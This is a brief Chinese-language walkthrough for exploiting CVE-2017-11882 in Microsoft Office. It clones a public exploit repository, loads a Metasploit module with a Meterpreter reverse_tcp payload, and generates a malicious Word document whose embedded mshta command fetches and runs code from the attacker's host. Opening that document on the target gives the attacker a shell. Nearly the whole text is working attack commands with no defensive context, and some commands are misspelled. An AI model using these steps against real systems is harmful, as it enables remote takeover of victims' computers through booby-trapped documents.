1.github克隆CVE-2017-11882的攻击脚本   

git clone https://github.com/starnightcyber/CVE-2017-11882.git


2.PS_shell.rb移动到/usr/share/metasploit-framework/modules/exploits/windows/local/

mv PS_shell.rb /usr/share/metasploit-framework/modules/exploits/windows/local/


3.开启msf

msfconsle
use exploits/windows/local/PS_shell
set payload windows/meterpreter/reverse_tcp
set URIPATH abc
expolit

4.再打开一个Terminal

python Command_CVE-2017-11882.py -c "mshta http://your_lhost:8080/abc" -o test.doc

在目标机器上用word打开test.doc        kail中的msf得到shell